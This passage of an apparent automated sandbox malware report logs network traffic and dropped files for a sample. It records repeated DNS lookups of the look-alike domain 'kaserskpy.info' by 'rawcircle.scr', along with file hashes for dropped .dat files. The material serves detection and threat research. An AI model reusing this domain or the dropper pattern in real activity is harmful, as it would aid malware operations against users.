                                                                                                                                                                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 2043
                                                                                                                                                                                                                                                                                                                                                                  Unused62: 8096267
                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: max-age=1166703
                                                                                                                                                                                                                                                                                                                                                                  Date: Sat, 13 Jul 2024 11:45:46 GMT
                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                • flag-gb
                                                                                                                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                                                                                                                  http://images.windowsmedia.com/svcswitch/media_guide_16x16.png
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  92.123.142.209:80
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  GET /svcswitch/media_guide_16x16.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Media-Player/12.0.7601.17514
                                                                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                  Host: images.windowsmedia.com
                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 28 Oct 2008 21:02:20 GMT
                                                                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                  ETag: "db34ed774039c91:0"
                                                                                                                                                                                                                                                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 897
                                                                                                                                                                                                                                                                                                                                                                  Unused62: 8096267
                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: max-age=316833
                                                                                                                                                                                                                                                                                                                                                                  Date: Sat, 13 Jul 2024 11:45:46 GMT
                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com.edgesuite.net
                                                                                                                                                                                                                                                                                                                                                                  IN CNAME
                                                                                                                                                                                                                                                                                                                                                                  a1095.g2.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  a1095.g2.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.35
                                                                                                                                                                                                                                                                                                                                                                  a1095.g2.akamai.net
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.58
                                                                                                                                                                                                                                                                                                                                                                • flag-gb
                                                                                                                                                                                                                                                                                                                                                                  GET
                                                                                                                                                                                                                                                                                                                                                                  http://redir.metaservices.microsoft.com/redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.35:80
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  GET /redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Windows-Media-Player/12.0.7601.17514
                                                                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                                  Host: redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                  HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                  Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                  Location: http://toc.music.metaservices.microsoft.com/cdinfo/GetMDRCD.aspx?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16
                                                                                                                                                                                                                                                                                                                                                                  Date: Sat, 13 Jul 2024 11:46:05 GMT
                                                                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  toc.music.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  toc.music.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                                                                                                                • 173.222.211.58:80
                                                                                                                                                                                                                                                                                                                                                                  http://redir.metaservices.microsoft.com/redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409
                                                                                                                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  535 B
                                                                                                                                                                                                                                                                                                                                                                  463 B
                                                                                                                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                                                                                                                  4

                                                                                                                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                                                                                                                  GET http://redir.metaservices.microsoft.com/redir/allservices/?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409

                                                                                                                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                                                                                                                  302
                                                                                                                                                                                                                                                                                                                                                                • 92.123.142.201:80
                                                                                                                                                                                                                                                                                                                                                                  http://onlinestores.metaservices.microsoft.com/bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409
                                                                                                                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  853 B
                                                                                                                                                                                                                                                                                                                                                                  1.9kB
                                                                                                                                                                                                                                                                                                                                                                  7
                                                                                                                                                                                                                                                                                                                                                                  6

                                                                                                                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                                                                                                                  GET http://onlinestores.metaservices.microsoft.com/serviceswitching/AllServices.aspx?sv=5&locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409

                                                                                                                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                                                                                                                  GET http://onlinestores.metaservices.microsoft.com/bing/bing.xml?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409

                                                                                                                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                                                                                                                • 92.123.142.209:80
                                                                                                                                                                                                                                                                                                                                                                  http://images.windowsmedia.com/svcswitch/mg4_wmp12_30x30_2.png
                                                                                                                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  475 B
                                                                                                                                                                                                                                                                                                                                                                  2.6kB
                                                                                                                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                                                                                                                  5

                                                                                                                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                                                                                                                  GET http://images.windowsmedia.com/svcswitch/mg4_wmp12_30x30_2.png

                                                                                                                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                                                                                                                • 92.123.142.209:80
                                                                                                                                                                                                                                                                                                                                                                  http://images.windowsmedia.com/svcswitch/media_guide_16x16.png
                                                                                                                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  481 B
                                                                                                                                                                                                                                                                                                                                                                  2.6kB
                                                                                                                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                                                                                                                  5

                                                                                                                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                                                                                                                  GET http://images.windowsmedia.com/svcswitch/media_guide_16x16.png

                                                                                                                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                                                                                                                • 173.222.211.35:80
                                                                                                                                                                                                                                                                                                                                                                  http://redir.metaservices.microsoft.com/redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16
                                                                                                                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  505 B
                                                                                                                                                                                                                                                                                                                                                                  444 B
                                                                                                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                                                                                                  3

                                                                                                                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                                                                                                                  GET http://redir.metaservices.microsoft.com/redir/getmdrcdbackground/?locale=409&geoid=f4&version=12.0.7601.17514&userlocale=409&wmid=5FA05D35-A682-4AF6-96F7-0773E42D4D16

                                                                                                                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                                                                                                                  302
                                                                                                                                                                                                                                                                                                                                                                • 127.0.0.1:5220
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                • 127.0.0.1:5220
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                • 127.0.0.1:5220
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                • 127.0.0.1:5220
                                                                                                                                                                                                                                                                                                                                                                  4188928d42578d01826be310ed423f73_JaffaCakes118.exe
                                                                                                                                                                                                                                                                                                                                                                • 127.0.0.1:5220
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  60 B
                                                                                                                                                                                                                                                                                                                                                                  139 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  78 B
                                                                                                                                                                                                                                                                                                                                                                  200 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com

                                                                                                                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                                                                                                                  173.222.211.58
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.35

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  onlinestores.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  85 B
                                                                                                                                                                                                                                                                                                                                                                  216 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  onlinestores.metaservices.microsoft.com

                                                                                                                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                                                                                                                  92.123.142.201
                                                                                                                                                                                                                                                                                                                                                                  92.123.140.35

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  wmplayer.exe
                                                                                                                                                                                                                                                                                                                                                                  69 B
                                                                                                                                                                                                                                                                                                                                                                  226 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  images.windowsmedia.com

                                                                                                                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                                                                                                                  92.123.142.209
                                                                                                                                                                                                                                                                                                                                                                  92.123.143.232

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  60 B
                                                                                                                                                                                                                                                                                                                                                                  139 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  60 B
                                                                                                                                                                                                                                                                                                                                                                  139 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  60 B
                                                                                                                                                                                                                                                                                                                                                                  139 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  78 B
                                                                                                                                                                                                                                                                                                                                                                  200 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  redir.metaservices.microsoft.com

                                                                                                                                                                                                                                                                                                                                                                  DNS Response

                                                                                                                                                                                                                                                                                                                                                                  173.222.211.35
                                                                                                                                                                                                                                                                                                                                                                  173.222.211.58

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  toc.music.metaservices.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  82 B
                                                                                                                                                                                                                                                                                                                                                                  155 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  toc.music.metaservices.microsoft.com

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  60 B
                                                                                                                                                                                                                                                                                                                                                                  139 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  60 B
                                                                                                                                                                                                                                                                                                                                                                  139 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info

                                                                                                                                                                                                                                                                                                                                                                • 8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info
                                                                                                                                                                                                                                                                                                                                                                  dns
                                                                                                                                                                                                                                                                                                                                                                  rawcircle.scr
                                                                                                                                                                                                                                                                                                                                                                  60 B
                                                                                                                                                                                                                                                                                                                                                                  139 B
                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                  1

                                                                                                                                                                                                                                                                                                                                                                  DNS Request

                                                                                                                                                                                                                                                                                                                                                                  kaserskpy.info

                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Media Player\Art Cache\LocalMLS\{FBDF5F04-3D0B-4372-AB4A-8D87BB607F06}.jpg

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  23KB

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  fd5fd28e41676618aac733b243ad54db

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  b2d69ad6a2e22c30ef1806ac4f990790c3b44763

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  a26544648ef8ceffad6c789a3677031be3c515918627d7c8f8e0587d3033c431

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  4c32623796679be7066b719f231d08d24341784ecfd5d6461e8140379f5b394216e446865df56e05b5f1e36962c9d34d2b5041275366aeabcd606f4536217fe4

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\0.dat

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  1B

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  cfcd208495d565ef66e7dff9f98764da

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1.dat

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  25KB

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  212ddd77efd824768ef4988e5ace6cce

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  a4075151428b170d8413960d948165ef501871dd

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  c301e161d731d051c30e1b66c8cd9dd1fde1f5fac84895aa55c527bbed92dc41

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  7b17253f1c8f37c68e00cf6830c1a62c5fd6617a22c5594ecc76787bef26f0d4632a1a5f3ded86b225ca9270d314f2465037e0c06597e19b3ecd90ab544d896f

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2.dat

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  219B

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  3676ba592a32bb9434599226129d6825

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  8f0612c1bcd02447b2e71268f704fed6d8b94e18

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  416ae91ed63c27575f531034919192d8f5263c525c05a775d0948c55f5b43437

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  39033c35de4d495584e2d8be606f58e5a07acb4c6f426a757a9f16c1b1ff8015fc9898aee8acd12aa5b768dfdff49e510f4573d48cb2ab08b13b7f2d2eb8a813

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3.dat

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  34KB

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  5a630ca16e715633272d3994d4cfe79d

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  bc3f62845989685321dfdf568c338103d3fa1e8c

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  9a081ff2756d1b9b08538402a2f40b69f86d51b0a305f6d2c2ff29a0496f837e

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  0c75b1cff44bf25d234ab072d8dbc488c67bf3610a9be2d1b58c49ede29bf092d015cc79f62545043abdcc3e5aa3798149d40b8210d274c9743bf3b24a36262e

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4.dat

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  535B

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  9cac34f332cf836e17fc2f2fa2bb71e4

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  d18afa52aeb5e2aa2c6d42bba50a0f7c9910dfb8

                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                  a1454355e66bc7f6d45301b83b1bbfd8b6aa5fd8c53c283f3ae10aba3d8950a7

                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                  b9ab7e6f465c6bcdfca25cd5e3f169771106e70cde4e946d887efc2676558b07eab1a0626b998406262f191f63e782a1a43bcf1e0654a1d7d98995deac534a1b

                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5.dat

                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                  441B

                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                  fa19559081b4ab5f084f93e66a9d42be

                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                  8359e8bfe26390bb9bf36a553d0a59c0db711007

                                                                                                                                                                                                                                                                                                                                                                  SHA256

